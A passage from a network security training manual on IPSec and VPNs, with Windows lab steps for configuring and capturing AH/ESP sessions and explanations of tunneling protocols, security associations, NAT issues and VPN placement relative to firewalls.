20. Under the Session Key settings, verify that the two boxes for generating
new keys for both time and size are unchecked.
21. Click OK three times to return to the Rule Properties.
22. Switch to the Authentication Methods tab.
23. Click Edit.
24. Select the Use This String To Protect The Key Exchange (Preshared
Key) radio button, and in the box, type Purple Enigma to provide the text
for the preshared key.
25. Click OK, click Close, then click OK to exit the Policy Properties.
334 Tactical Perimeter Defense
Configuring the AH-and-ESP IPSec Response Policy
In order for the two hosts to communicate, they must have compatible IPSec
policies implemented. By now, you are familiar with the procedure, so the fol-
lowing task should be rather straightforward.
TASK 6D-5
Implementing the 7_RESPOND_
AH(sha)+ESP(sha+3des) Policy
Note: Perform this task only if you are designated as Student_P. Student_Q is
advised to follow along.
1. Create another IP Security Policy. Click Next.
2. For the IP Security Policy Name, type 7_RESPOND_
AH(sha)+ESP(sha+3des) and click Next.
3. Uncheck Activate The Default Response Rule, and click Next.
4. Uncheck Edit Properties, and click Finish.
5. Double-click the new policy.
6. On the Rules tab, verify that Use Add Wizard is unchecked, check
<Dynamic> Default Response, and click Edit.
7. Remove all but one security method.
8. Select the remaining method, and click Edit.
9. Under Security Method, click the Settings button found under Custom.
10. Verify that AH is checked.
11. Select the integrity algorithm as SHA1.
12. Verify that ESP is checked.
13. Select ESPs integrity algorithm as SHA1.
14. For Encryption Algorithm, select 3DES.
15. Under Session Key settings, verify that the two boxes for generating new
keys for both time and size are unchecked.
16. Click OK twice to return to the Rule Properties.
17. Switch to the Authentication Methods tab.
18. Click Edit.
Lesson 6: Implementing IPSec and VPNs 335
19. Select the Use This String To Protect The Key Exchange (Preshared
Key) radio button, and in the box, type Purple Enigma to provide the text
for the preshared key.
20. Click OK twice, and then click Close to exit the Policy Properties.
21. Close the console without saving settings.
Implementing the Full IPSec Session
So far, you have congured a policy where Student_Q will require other comput-
ers that attempt to communicate with it to implement AH by using the SHA-1
algorithm and ESP by using both the SHA-1 and 3DES algorithms; Student_Q
also will respond only by using this algorithm. Now, lets see what happens when
Student_P follows Student_Qs lead.
When you perform the nal analysis in Network Monitor, keep the following in
mind: If you were to perform a Hex-to-Hex comparison of the two captures, you
would see that due to the additional overhead imposed by the 7_REQUIRE_
AH(sha)+ESP(sha+3des) policy over the 6_REQUIRE_AH(md5)+ESP(des)
policy, the actual number of bits is greater. In fact, if you had tried to actually
transfer large les between the two machines, then the number of frames would
have actually been greater.
TASK 6D-6
Implementing and Analyzing an AH(sha) and
ESP(sha+3des) IPSec Session
Note: Perform step 1 through step 2 only if you are designated as Student_Q.
1. Open your ipsec.mmc.msc console. Assign the 7_REQUIRE_
AH(sha)+ESP(sha+3des) policy. When you assign this policy, the
previously assigned policy is automatically unassigned.
2. Start Network Monitor, and start a capture.
Note: Perform step 3 through step 7 only if you are designated as Student_P.
3. Open your ipsec.mmc.msc console. Assign the 7_RESPOND_
AH(sha)+ESP(sha+3des) policy.
4. At the command prompt, enter ftp IP_address_of_Student_Q
You should be able to successfully ftp to Student_Q.
5. Log on as anonymous with no password.
6. Enter dir to see a list of les hosted on the ftp site.
7. Exit the ftp session.
336 Tactical Perimeter Defense
Note: Perform the rest of this task only if you are designated as Student_Q.
8. In Network Monitor, stop and view the capture.
9. Observe that once ISAKMP establishes the encryption method, all data is
encrypted with ESP.
10. Identify any differences with respect to the negotiation process, encryp-
tion, or integrity algorithms.
11. Where does the Packet identify that AH is in use?
In the IP Header.
What is the Protocol ID assigned to AH?
(0x33)
Where does the AH information dene the use of ESP?
In the AH Next Header.
What is the Protocol ID assigned to ESP?
50 (0x32)
12. Close Network Monitor. You can save your capture to a le if you like.
13. Unassign all IPSec policies on all machines.
Topic 6E
VPN Fundamentals
A Virtual Private Network (VPN) provides a private tunnel through a public
cloud (such as the Internet). A VPN enables a group of two or more computer
systems to communicate over the Internet or any other public network. VPNs can
exist between an individual machine and a private network (client-to-server) or a
remote LAN (like a branch office) and a private, enterprise network (server-to-
server). Secure VPNs make use of tunneling and security protocols to maintain
the privacy of data transactions over the Internet.
A VPN is virtual, as opposed to a real private network. The idea is to make a
private network that provides a secure tunnel for the exchange of data between
two or more parties. If this were done over a real private network, the dedicated
lines/bandwidth and service would make it cost prohibitive. But when this idea of
a secure tunnel is implemented over a public network such as the Internet, the
costs as well as the bandwidth are spread among many users, thus creating a Vir-
tual Private Network.
LAN:
(Local Area Network) A
computer communication
system limited to no more
than a few miles and using
high-speed connections (2 to
100 megabits per second). A
short-haul communication
system that connects ADP
devices in a building or
group of buildings within a
few square kilometers,
including workstations, front-
end processors, controllers,
and servers.
Lesson 6: Implementing IPSec and VPNs 337
VPN Business Drivers
VPNs are popular today for a number of reasons, including:
Mature standards, protocols, and technology.
Signicant cost savings.
Reduction in network complexity, resulting in lower network operation costs.
Increased security and encryption capabilities.
The Need for Remote Access
Remote access is a business requirement todayrequired for both communication
and interaction. To determine whether or not a VPN is a good answer to your
companys needs for remote connectivity, consider your specic technical require-
ments, along with the pros and cons of VPN use.
Some advantages to using VPNs include:
The ability to securely connect high-speed remote users over broadband
technology, including cable modems and DSL lines, that was not possible
before the advent of VPNs. VPNs will work with any last-mile technology
as long as IP is running over the connection.
No administrative headaches for managing direct access telephone lines
(dedicated leased lines), ISDN, T1, or PRI lines used for data, or for the
RAS equipment (modems or other network access servers). Terminating the
phone calls creates potential cost savings, especially if many of your remote
users are located outside your local calling area.
Some disadvantages include:
Potentially lower bandwidth available to remote users over a VPN connec-
tion, as compared to a direct dial-in line.
Inconsistent remote access performance due to changes in Internet
connectivity. To counteract this, you can have your users choose ISPs that
have higher levels of service, perhaps the same ISP from which you pur-
chase your corporate Internet connection, to keep the majority of your traffic
on the same backbone.
No entrance into the network if the Internet connection is broken. Some
administrators choose to leave a limited amount of dial-in access for emer-
gency access.
The Need for Extranets
Most VPNs can be designed to work as an extranet. But not all extranets are
VPNs. Although there are several different meanings attributed to the term, it
commonly refers to a type of network that gives outside userssuch as custom-
ers, clients, and business associatesaccess to data residing on a corporations
network. Users access the data through a web browser over the Internet and typi-
cally need to enter a user name and password before access to the data is granted.
Depending on the level of security needed, a company could choose to use an
extranet approach or a customized approach that combines password protection of
network servers with third-party authentication systems.
A VPN can be used in a similar manner, but a VPN typically has much higher
security associated with it. Specically, a VPN typically requires the establish-
ment of a tunnel into the corporate network and the encryption of data passed
between the users PC and corporate servers.
338 Tactical Perimeter Defense
VPN Types
Even though the number of solutions is steadily increasing, VPNs fall under three
main types:
Hardware-based VPNs, for use in gateway-to-gateway conguration.
Firewall-based VPNs.
Software-based VPN applications, for use in client-to-client conguration.
Most hardware-based VPN systems are encrypting routers. Dedicated hardware
VPN products offer better performance, security, reliability, and scalability than
software-based solutions running on conventional servers and operating systems.
They offer better performance and are more scalable because they are custom-
built to perform essential tasks, such as encryption and decryption, as quickly as
possible, often by having dedicated chips to carry out these functions. Their secu-
rity is better because they are not vulnerable to weaknesses in an underlying
operating system or hard disks that can fail or run out of space. The best hard-
ware VPN packages offer software-only clients for remote installation, and
incorporate some of the access control features more traditionally managed by
rewalls or other perimeter security devices. However, they may not be as ex-
ible as software-based VPNs.
Firewall-based VPNs take advantage of the rewalls security mechanisms,
including controlling access to the internal network. They also perform Network
Address Translation (NAT), satisfy requirements for strong authentication, and
serve up real-time alarms along with audit logs. Most commercial rewalls also
harden the host operating system kernel by stripping out unnecessary services,
such as default accounts for guest users that is a clear vulnerability for exploita-
tion, thus providing additional security for the VPN server. Operating system
protection is a major plus, since very few VPN application vendors supply guid-
ance on operating system security. Performance may be a concern, especially if
the rewall is already congured; however, some rewall vendors offer hardware-
based encryption processors to minimize the impact of VPN management on the
system.
Software-based VPNs are ideal in situations where both user and destination
endpoints of the VPN are not controlled by the same organization, and when dif-
ferent rewalls and routers are implemented within the same organization. At the
moment, stand-alone VPNs offer the most exibility in how network traffic is
managed. Many software-based products allow traffic to be tunneled based on IP
address or protocolunlike hardware-based products, which generally tunnel all
traffic they handle regardless of protocol. Tunneling specic traffic types is advan-
tageous in situations where remote sites may see a mix of trafficsome that need
transport over a VPN to access data or some that do not, as in simple web
surng. In situations where performance requirements are not heavy, software-
based VPNs may be the best choice.
A disadvantage might be that software-based systems are generally harder to
manage than encrypting routers. They require familiarity with the host operating
system, the application itself, and appropriate security mechanisms must be in
place. Also, most software-based VPN packages require changes to routing tables
and network addressing schemes.
As the VPN market evolves, the distinctions between VPN architectures are
becoming less clearly dened. Some hardware vendors have added software cli-
ents to their product offerings, and extended their server capabilities to include
some of the security features more traditionally offered by software- or rewall-
Lesson 6: Implementing IPSec and VPNs 339
based VPNs. A few stand-alone products have added support for hardware-based
encryptors to improve their performance. For all types of VPNs, further imple-
mentation of the proposed IP Security Protocol (IPSec) is making interoperability
easier with different VPN products by softening the lines of distinction between
them.
VPN Elements
The critical elements of a VPN connection are described in the following table.
Name Description
VPN server Accepts connections from VPN clients and can also provide VPN connections
between routers.
VPN client Initiates the VPN connection that ends up at the VPN server. A VPN client can
be an end-user system, such as Windows 2000 or Windows XP, or it can be a
router that gets a router-to-router connection. A VPN client can be a Point-to-
Point Tunneling Protocol (PPTP) client or a Layer 2 Tunneling Protocol
(L2TP) client using IPSec.
Tunnel The part of the connection where the data is encapsulated.
VPN connection The part of the connection where the data is encrypted. The data must be both
encrypted and encapsulated along the same part of the connection for the
connection to be considered a secure VPN connection.
Tunneling protocols The communication standard used to manage the tunnel and encapsulate the
data. For example, Windows 2003 supports PPTP and L2TP tunneling
protocols.
Tunneled data Is sent across the private point-to-point link.
Transit network The IP internetwork (for example, the Internet) that connects the VPN client
with the VPN server.
Each of the different types of VPN congurations can be enabled by using some
combination of the following technology components:
Dedicated VPN gateways
IPSec-enabled routers and rewalls
VPN client software
IPSec-enabled operating systems, such as Windows 2003
A number of security applications combine VPN and rewall functionality into a
single box. This is very useful for branch offices communicating with central
office gateways.
340 Tactical Perimeter Defense
Tunneling and Security Protocols
Tunneling is a technique where a data packet is transferred inside the frame or
packet of another protocol. Therefore, the infrastructure of one network is used to
travel to another. A tunnel can be thought of as a session pipe. A VPN client con-
nects to a VPN server through a tunnel using a tunneling protocol. The logical
path along which the encapsulated packet is routed is called the tunnel. Tunneling
describes the entire process.
Encapsulation of the data packet at the source.
Transmission of the data packet through the tunnel.
Un-encapsulation of the data packet at the destination.
In a VPN connection, encrypted data is sent through the tunnel. Both the tunnel
client and the tunnel server must use the same tunneling protocols. The major
tunneling protocols for VPNs are:
Point-to-Point Tunneling Protocol (PPTP)
Layer 2 Tunneling Protocol (L2TP)
IP Security Protocol (IPSec)
Tunneling mechanisms differ in terms of:
What is done to the data for encryption and authentication.
The OSI layer at which they operate.
The headers that describe the data transmission and authentication.
TASK 6E-1
Defining Tunneling Protocols
1. Dene the three major tunneling protocols for VPNs:
Point-to-Point Tunneling Protocol (PPTP), Layer 2 Tunneling Protocol
(L2TP), and IP Security Protocol (IPSec)
Topic 6F
Tunneling Protocols
Earlier in the course, you studied the IPSec protocol intensively, by working with
various IPSec policy settings and testing their validity. The policies, however,
were tested only in Transport Mode. When IPSec is used to secure VPN commu-
nication, it is used in Tunnel Mode.
IP Security Protocol (IPSec) is an evolving security protocol from the Internet
Engineering Task Force (IETF) that provides authentication and encryption over
the Internet. Normal IPv4 packets consist of headers and payload, both of which
contain information of value to an attacker. The header contains source and desti-
nation IP addresses, which are required for routing, but may be spoofed or altered
in what are known as man-in-the-middle attacks. The payload consists of infor-
mation that may be condential to a particular organization.
OSI:
(Open Systems
Interconnection) A set of
internationally accepted and
openly developed standards
that meet the needs of
network resource
administration and integrated
network components.
Lesson 6: Implementing IPSec and VPNs 341
The two prime functions of IPSec are to ensure data security and data integrity.
Security is achieved through data encryption techniques, and integrity through a
combination of techniques that authenticate the data sender. IPSec is a set of
industry standards for cryptography-based protection services and protocols.
As mentioned in the previous topic, the major tunneling protocols for VPNs are
PPTP, L2TP, and IPSec. Each of the three VPN protocols provides different levels
of security and ease of deployment. The standardization process has made the
Layer 2 Tunneling Protocol (L2TP) and IPSec the protocols of choice. PPTP is
widely used for remote access connections, primarily because of its integration in
the Microsoft operating systems.
PPTP, L2TP, and Ciscos Layer 2 Forwarding Protocol (L2F) are all designed to
work at Layer 2 of the OSI model. IPSec is the only protocol engineered to work
at Layer 3 of the OSI model. IPSec is fast emerging as the protocol of choice to
build the best VPN system because it supports:
Strong security
Encryption
Authentication
Key management
When dealing with VPNs in a multi-protocol non-IP network environment, PPTP
or L2TP may be a better choice. Both PPTP and L2TP are strictly tunneling
protocols. Since IPSec was designed for the IP protocol, it has wide industry sup-
port and is expected to eventually become the standard for VPNs on the Internet.
Other tunneling protocols include:
Secure Shell (SSH)
Socks v5
These offer Application layer tunnels, as well as various implementations of tun-
nels, such as cascaded tunnels, nested tunnels, or end-to-end tunnels. The SSH
protocol is a widely used Application layer tunneling protocol that uses a public
key cryptographic system to ensure security. SSH is freely available as a direct
result of OpenSSH initiatives. The SSH protocol suite offers a secure replacement
for Telnet, rlogin, FTP, and other programs, in addition to tunneling capabilities.
Socks v5 offers an Application layer VPN by providing desktop-to-server authen-
tication and encryption. While both SSH and Socks v5 are exceptional application
(session)-tunneling protocols, they are not widely deployed in strategic enterprise
VPN solutions.
Point-to-Point Tunneling Protocol (PPTP)
The PPTP Forum developed the Point-to-Point Tunneling Protocol (PPTP)
specication. This forum included Ascend Communications, 3Com/Primary
Access, ECI Telematics, U.S. Robotics, and Microsoft. PPTP has fast become the
most widely used protocol for creating dial-in remote access VPNs. A key reason
for the success of PPTP for dial-in remote access has been support for the proto-
col by Microsoft. Microsoft supports PPTP on the NT Server platform version 4.0
and above and includes a free PPTP client in the desktop operating system. The
Microsoft version of PPTP is its own version of the IETF PPTP protocol, and it
is the Microsoft version that is the de facto standard for PPTP deployments. Most
vendor products use Microsofts version of the protocol.
cryptography:
The art of science
concerning the principles,
means, and methods for
rendering plain text
unintelligible and for
converting encrypted
messages into intelligible
form.
SSH:
(Secure Shell) A completely
encrypted shell connection
between two machines
protected by a super long
pass-phrase.
342 Tactical Perimeter Defense
Working at Layer 2 of the OSI model, PPTP encapsulates PPP packets using a
modied version of Generic Routing Encapsulation (GRE), which gives PPTP the
capability to handle any supported network layer protocol such as IP, IPX, and
NetBEUI.
While PPTP is best suited for remote access VPNs, there are some security issues
related to it. These issues relate to vulnerabilities associated with the Challenge/
Response Authentication Protocol (Microsoft CHAP), as well as the RC4-based
encryption protocol (MPPE). Even though there have been security updates and
enhancements by Microsoft, it is still recommended that Microsofts PPTP proto-
col not be used in VPN systems where there is a strong need to protect sensitive
data. PPTP may be an appropriate solution to deploy in smaller organizations that
may only need a limited regional VPN, supporting small numbers of mobile
users.
Layer 2 Tunneling Protocol (L2TP)
Layer 2 Tunneling Protocol (L2TP), dened in RFC 2661, is a protocol for tun-
neling PPP sessions across a variety of network protocols such as IP, Frame
Relay, or ATM. The IETF working group joined the PPTP group efforts with
Ciscos Layer 2 Forwarding Protocols (L2Fs) initiatives to develop L2TP. L2TP
is the successor to PPTP and L2F.
L2TP was specically designed for client-to-gateway and gateway-to-gateway
connections with broad tunneling and security interoperability. L2TP has wide
vendor support because it addresses the IPSec shortcomings of client-to-gateway
and gateway-to-gateway connections. L2TP tunnels appear as IP packets, so
IPSec Transport Mode provides authenticity, integrity, and condentiality security
controls.
L2TP tunneled-in IP, using UDP port 1701, is used as the VPN tunneling protocol
over the Internet for tunnel maintenance. Compressed or encrypted PPP frames
encapsulated in L2TP also use UDP to transmit tunneled data.
Lesson 6: Implementing IPSec and VPNs 343
IPSec
IPSec in Tunnel Mode secures TCP/IP-based protocols using Layer 2 Tunneling
Protocol (L2TP). Three main components form the building blocks of the IPSec
protocol suite.
Component Description
Authentication Header (AH) Provides authentication, integrity, and anti-replay protection for
both the IP header and the data payload. It does not provide
condentiality.
Encapsulating Security Payload
(ESP)
Provides condentiality and/or authentication. Data is encrypted
before it is transmitted.
Security Association (SA) Denes the security policy to be used in managing the secure
communication between two nodes.
Keep in mind that you can use IPSec itself as the tunneling protocol, or you can
use L2TP to create the tunnel and let IPSec provide data encryption. L2TP does
not provide its own encryption service; it uses IPSecs ESP protocol to encrypt
and authenticate the entire UDP datagram, thereby protecting it from compromise
by unauthorized users. You can create L2TP tunnels without encryption, but this
is technically not a VPN because the data is not protected.
Authentication Header (AH)
IPSec provides mechanisms to protect both header and payload data. The IPSec
Authentication Header (AH) provides a mechanism for data integrity and data
origin authentication for IP packets using the hashing algorithms Hash-based
Message Authentication Code (HMAC) with MD5 or HMAC with Secure Hash
Algorithm 1 (SHA-1). Use of the IP AH is indicated with the value 51 in the
IPv4 Protocol eld or IPv6 Next Header eld in the IP packet header.
AH digitally signs the outbound packet, both data payload and headers, with a
hash value appended to the packet, verifying the identity of the source and desti-
nation machines and the integrity of the payload.
Encapsulating Security Payload (ESP)
The IPSec Encapsulating Security Payload (ESP) guarantees the integrity and
condentiality of the data in the original message by combining a secure hash
and encryption of either the original payload by itself, or a combination of both
the headers and payload of the original packet. As in AH, ESP uses HMAC with
MD5 or SHA-1 authentication; privacy is provided using DES-CBC encryption.
Placing a value of 50 in the IPv4 Protocol eld or IPv6 Next Header eld in the
IP packet header indicates use of the IP ESP format. Both AH and ESP provide
sequence numbers in each packetthis prevents a replay attack.
Security Association (SA) and Key Exchange
Before two parties can exchange secure data that is authenticated and encrypted,
those parties need to determine:
Which algorithms will be used for the session.
How the key exchange will take place.
How often keys will need to change.
AH:
(Authentication Header) A
eld that immediately follows
the IP header in an IP
datagram and provides
authentication and integrity
checking for the datagram.
ESP:
(Encapsulating Security
Payload) A mechanism to
provide condentiality and
integrity protection to IP
datagrams.
344 Tactical Perimeter Defense
Then, the two parties need to actually exchange the keys. These values are pack-
aged together in a Security Association (SA) to facilitate secure communication
between the two systems. Authentication and condentiality using AH or ESP use
SAs. A primary role of IPSec key exchange is to establish and maintain SAs. SAs
are logical, uniquely dened and uni-directional, or one-way connections between
two communicating IP endpoints that provide security services to the traffic it
carries using either AH or ESP procedures. The endpoints of the tunnel can be an
IP host or IP security gateway, which is a VPN-enabled network device. Provid-
ing security to the more typical scenario of two-way (bi-directional)
communication between two endpoints requires the establishment of two SAs
(one in each direction).
Two types of SAs are dened in IPSec, regardless of whether AH or ESP is used
for the session. A Transport Mode SA is a security association between two hosts
that provide the authentication and/or encryption service to the higher layer
protocol. Only IPSec hosts support this mode of operation. A Tunnel Mode SA is
a security association applied to an IP tunnel. In this mode, an IP header species
the IPSec destination and an encapsulated IP header species the destination for
the IP packet. Both hosts and security gateways support this mode of operation
and it is considered the more secure of the two.
IPSec is controlled specically by a security policy of both sender and receiver
and one or more Security Associations (SA) negotiated between them. An SA
between the sending and receiving parties provides access control based on the
distribution of cryptographic key and traffic management relative to the AH and
ESP security protocols. The SA is either one, one-way relationship or two one-
way relationships in complimentary directions. A Security Parameter Index (SPI)
uniquely distinguishes each SA from other SAs. The IPSec security policy con-
sists of a lter list and associated actions.
For a successful deployment of IPSec, a scalable, automated SA and key manage-
ment scheme is necessary. Several protocols have been dened for these
functions:
The Internet Security Association and Key Management Protocol (ISAKMP)
denes procedures and packet formats to establish, negotiate, modify, and
delete SAs. It also provides the framework for exchanging information about
authentication and key management, but it is completely separate from key
exchange.
The Oakley Key Determination Protocol (Oakley) describes a scheme by
which two authenticated parties can exchange key information. Oakley uses
the Diffie-Hellman key exchange algorithm.
The Internet Key Exchange (IKE) algorithm is the default automated key
management protocol for IPSec, which is the result of combining both
ISAKMP and Oakley protocols.
Key exchange is closely related to the management of SAs. When you need to
create an SA, you need to exchange keys, and IKE is the framework that wraps
together all the required pieces and delivers them as an integrated package.
IPSec Components
The key IPSec components are described in the following table.
Component Use
IPSec driver Monitors, lters, and secures IP trafc.
Lesson 6: Implementing IPSec and VPNs 345
Component Use
The Internet Security Association
Key Management Protocol
(ISAKMP/Oakley)
Key exchange and management services to oversee security
negotiations between hosts.
IP Policy Agent Looks for appropriate policies and delivesr these policies to the
IPSec driver and ISAKMP.
IP Security Policy and Security
Association
Denes the security environment in which the two hosts must
communicate.
Security Association API Provides the programming interface that will be used between the
IPSec driver, ISAKMP, and the Policy Agent.
Management Tools Creates policies, tracks IP security statistics, and creates and logs
appropriate IP security events.
IPSec Tunnel and Transport Modes
In IPSec Tunnel Mode, one packet is encapsulated or tunneled in another packet,
while IPSec Transport Mode secures the packet exchange end-to-end, source to
destination. IPSec Tunnel Mode is used primarily for link-to-link packet
exchanges between intermediary devices, like routers and gateways, while Trans-
port Mode provides the security service between the two communicating
endpoints.
Either mode can use ESP or AH packet types. Both modes require that the two
clients engage in a complex negotiation involving the IKE protocol and PKI cer-
ticates for mutual authentication.
In Transport Mode, both of the end systems must support IPSec, but the interme-
diate systems do not have to support IPSec because they simply forward packets.
Tunnel Mode is intended for gateway-to-gateway links. In Tunnel Mode, the
sender encapsulates the entire IP datagram by creating a completely new header.
The ESP protocol encrypts the entire datagram, including the original IP header
and the AH protocol, generates a signature for the entire packet, including both
the original IP header and the new one. Therefore, the encapsulation and encryp-
tion processes create a secure tunnel through an inherently insecure network. In
Tunnel Mode, only the gateways providing the security services must support
IPSec. The end systems (ultimate source and ultimate destination systems) do not
have to support IPSec.
IPSec and Network Address Translation (NAT)
Network Address Translation (NAT) is not compatible with the Authentication
Header (AH) protocol, whether used in Transport or Tunnel Mode. An IPSec
VPN using the AH protocol digitally signs the outbound packet, which includes
both data payload and headers by appending a hash value to the packet. When
using the AH protocol, the data payload within the packet is not encrypted.
346 Tactical Perimeter Defense
The compatibility problem stems from the fact that a NAT device in between the
IPSec endpoints will rewrite either the source or destination address with one of
its own choosing. The VPN device at the receiving end will verify the integrity of
the incoming packet by computing its own hash value, and will complain that the
hash value appended to the received packet doesnt match. The VPN device at
the receiving end doesnt know about the NAT in the middle, so it assumes that
the data has been altered while in transit.
IPSec, using ESP in Tunnel Mode, encapsulates the entire original packet (includ-
ing headers) in a new IP packet. The new IP packets source address is the
outbound address of the sending VPN gateway, and its destination address is the
inbound address of the VPN device at the receiving end. When using ESP proto-
col with authentication, the packet contents (in this case, the entire original
packet) are encrypted. The encrypted contents, but not the new headers, are
signed with a hash value appended to the packet.
This mode (Tunnel Mode ESP with authentication) is compatible with NAT,
because integrity checks are performed over the combination of the original
header plus the original payload, which is unchanged by a NAT device. Transport
Mode ESP with authentication is also compatible with NAT, but it is not often
used by itself. Since the hash is computed only over the original payload, original
headers can be rewritten.
TASK 6F-1
Assigning Tunneling Protocols
1. In the table provided here, assign the tunneling protocols: IPSec, PPTP,
L2TP, SSH and Socks v5 to their corresponding OSI layers.
Layer Number Name Protocols
7 Application SSH, Socks v5SSH, Socks v5
6 Presentation
5 Session
4 Transport
3 Network IPSec
2 Data Link PPTP, L2TP
1 Physical
Lesson 6: Implementing IPSec and VPNs 347
Topic 6G
VPN Design and Architecture
VPN conguration is often complex. Conicts between NAT and IPSec can cause
legitimate packets to be refused or dropped. Further, strong authentication of a
VPN client is critical. If the client is not strongly authenticated, the enterprise is
at risk of an intruder remotely taking control of the client system and gaining an
open tunnel into the enterprise network.
One VPN design choice would be to require a personal rewall with built-in
intrusion detection on the remote client. The personal rewall would block any
inbound communication, and when intrusions are detected, it would report back
to the logging server on the enterprise network.
The problem with this design is guaranteeing that the personal rewall software is
always present or functional on the client side. Further, how does the enterprise
network force a disconnect of the tunnel session? How does it deactivate the
users account?
Designing an IPSec-based VPN solution involves addressing the following objec-
tives:
Designing an IPSec encryption scheme.
Designing an IPSec management strategy.
Designing negotiation policies.
Designing security policies.
Designing IP lters.
Dening security levels.
VPN Implementation Challenges
Most organizations experience challenges with rolling out and deploying a VPN.
In this section, you will examine some key VPN challenges and provide guide-
lines to minimize implementation-related problems and issues.
Typical challenges experienced with VPN deployment include:
Difficulty with centralized management of client policy, conguration, and
strong authentication requirements.
Lack of protocol interoperability (for example, interoperability between NAT,
IPSec, and PPTP).
Complexity of infrastructure.
Specic challenges that an organization may experience in the process of deploy-
ing a VPN include:
Addressing and routing.
Administration.
Common addressing methods for VPNs include DHCP and NAT address pools.
The problem is that NAT and IPSec have had compatibility problems. Some ven-
dors, such as Cisco, are solving the problem by licensing an IPSec-over-UDP
client that allows IPSec connections through NAT. The IETF is working to intro-
security level:
The combination of a
hierarchical classication
and a set of non-hierarchical
categories that represents the
sensitivity of information.
348 Tactical Perimeter Defense
duce new standards for IPSec and NAT to work together better. According to
RFC 2026, established SAs would no longer be bound to IP addresses. Instead,
SAs would be controlled via Host Identity Tags (HIT) and Scope Identity elds.
Therefore, a VPN client system could conceivably change its IP address using
Mobile IP, DHCP, PPP, or even IPv6, and still maintain the same SA with its
communication partner.
Also, a draft protocol called the Host Identity Protocol (HIP) would be integrated
into existing IKE code, allowing IKE to work across NAT devices as well. The
IETF is also working on long-term solutions to make NAT and IPSec work
together better. Until new standards are established, the most popular way to
overcome problems with IPSec Tunnel Mode with NAT is to use ESP Transport
Mode. This allows the VPN to traverse a NAT device, such as a gateway. How-
ever, client authentication cannot be guaranteed because IP headers are not
veried upon receipt. The inability to authenticate communication partners in a
VPN tunnel compromises the purpose of IPSec.
The challenge for administration is to make sure that remote VPN clients have
installed and congured their VPN software correctly. Also, they need to have
security mechanisms in place to make sure that the client host is secure against
attacks that might use the VPN connection to access the corporate network.
Other VPN challenges include:
Authentication and key management
Fault tolerance
Performance
Reliable transport
VPN architecture
TASK 6G-1
Examining VPN-related RFCs
1. Navigate to C:\Tools\Lesson6\RFCs then open rfc-index.wri.
2. Perform a search using the keyword VPN
You should see RFC 2547 highlighted. RFC 2547 describes a method by
which an Internet Service Provider may provide VPNs for its customers.
3. Identify the method used, and then close the le.
4. In C:\Tools\Lesson6\RFCs, scroll down to rfc2547.txt.
5. Scroll down to the third paragraph in section 1.1, and read the deni-
tions for intranet and extranet. Note if these compare to your
understanding of these terms.
6. Close all open windows.
Lesson 6: Implementing IPSec and VPNs 349
Topic 6H
VPN Security
A VPN is not necessarily secure. This is because a VPN is typically protected by
nothing more than a weak password. Sending information over the Internet is not
secure, and therefore, has the corporate world concernedeven with the advent
of VPNs. In practical terms, information passing over a secure VPN will poten-
tially be routed across several networks that are not under the control of the
sender. An important part of any VPN is the encryption that will secure the data
payload from unauthorized users.
Although most of the VPN solutions delivered today use Triple-DES encryption,
there is a widely used, older, weaker type of encryption called DES, or Single-
DES. Triple-DES, which is the type of encryption normally implemented in
todays solutions, is much more secure than Single-DES, and has never been
broken. Thats how safe data passing through a secure VPN is.
Virtually all of the common encryption technologies can be used in a VPN. Most
VPN equipment vendors give the user a choice. IT managers can often select
anything from the 40-bit built-in encryption offered by Microsoft under Windows
95 to more robust encryption technologies like Triple-DES.
VPN vendors support a number of different authentication methods. Many ven-
dors now support a wide range of authentication techniques and products,
including such things as Kerberos, tokens, and software- and hardware-based
dynamic passwords.
The primary purpose of a VPN is to secure the data in transmission. Four critical
functions must be in place to ensure this.
Data encryption, which ensures that no one who intercepts data as it travels
through the Internet can read it. Most solutions delivered today use Triple-
DES encryption, which is so strong that it has never been broken.
Data integrity, which checks each data packet received from the Internet to
make sure that it has not been modied during transit.
User authentication, which ensures that only authorized people can gain
access to corporate resources through a VPN. There are many different meth-
ods in which users can authenticate themselves, from very basic user name
and password authentication to much more secure methods, such as digital
certicates, smart cards, SecureID tokens, biometrics, and others.
Access control, which restricts unauthorized access to the network.
A VPN must secure the data against eavesdropping and tampering by unautho-
rized parties. Depending on the VPN solution being implemented, there are a few
ways to control the type of traffic sent over a VPN session. Many VPN devices
allow you to dene a user- or group-based lter, which can control IP address
and protocol/port services allowed through a tunnel. In addition, IPSec-based
VPNs allow you to dene a list of networks to which traffic can be passed (Secu-
rity Associations). The rst mechanism allows the administrator to limit access to
specic networks/machines and applications on their network. The second usually
provides full connectivity to the private network. Allowing VPN access only in
conjunction with strong authentication also prevents an intruder from successfully
authenticating to your network, even if they somehow congured/captured a VPN
session.
350 Tactical Perimeter Defense
VPNs and Firewalls
Two of the most common congurations for a VPN device providing corporate
remote access are to run a VPN device either in parallel to an existing rewall or
behind an existing rewall. Terminating VPN sessions in front of a rewall or on
a rewall itself is not as popular. There are pros and cons for all implementations.
Placing a VPN device in parallel to an existing rewall requires no changes
to an existing rewall infrastructure, but it also means that you will have
two entry points into your private network. On most VPN devices, you
should verify that they block all non-VPN traffic to minimize the additional
security risk. Depending on how your network is set up, this will probably
also require the VPN device to do some sort of address translation, or to
have the ability to redirect this traffic to an existing rewall.
Placing a VPN device behind an existing rewall forces you to make
changes to the conguration of your rewall. You will also need a rewall
smart enough to be able to congure a lter to pass the VPN traffic. Depend-
ing on how your network is set up, this may also allow you to make use of
only one of the two or more Ethernet ports on your VPN device. This con-
guration is sometimes known as one-arm-routing.
Placing a VPN device in front of your rewall terminates secure traffic in a
public zone. You will need to assign addresses to users from a certain block
of IP addresses and open a large hole in the rewall for access from these IP
addresses. A potential advantage to doing this would be that you could then
use your existing rewall to control the destination of traffic, but most VPN
boxes will also allow you to do this. This type of application may make
more sense for trading-partner connectivity, as opposed to connectivity for
remote access users.
Implementing a VPN on an existing rewall adds some intense processing to
a device whose original purpose was, simply speaking, to control network
access. Some people like the simplicity of adding a service to an existing
device on the network perimeter.
The use of encryption adds some additional overhead to a session. Most VPN
devices, whether hardware- or software-based, will be able to process encryption
for connections up to 10Base-T speeds. On a lower-speed connection like a
modem, VPN processing is much faster than delays introduced by the limited
bandwidth availability. Often, performance is potentially affected more by packet
loss and latency on bad Internet connections than by the encryption overhead.
A VPN client typically establishes a connection with a VPN server using either
L2TP over IPSec or PPTP. Keep in mind the following information related to
PPTP, as it may be required for dening packet lters for VPN traffic on rewall
systems:
TCP port 1723 allows PPTP tunnel maintenance traffic to move from the
PPTP client to the PPTP server.
IP protocol type 47 allows the PPTP tunneled data to move from the PPTP
client to the PPTP server.
